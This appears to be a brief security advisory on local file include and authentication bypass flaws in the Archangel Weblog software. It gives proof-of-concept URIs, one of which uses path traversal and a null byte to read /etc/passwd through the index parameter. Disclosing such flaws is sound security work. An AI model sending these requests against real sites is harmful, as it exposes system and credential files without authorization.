Archangel Weblog Local File Include And Authentication Bypass Vulnerabilities

Archangel Weblog Local File Include And Authentication Bypass Vulnerabilities

Attackers can exploit these issue through a browser.

The following proof-of-concept URIs are available:

http://www.example.com/[TARGET]/[PATH]/index.php?index=[Local File]%00
http://www.example.com/blog/index.php?index=../../../../etc/passwd%00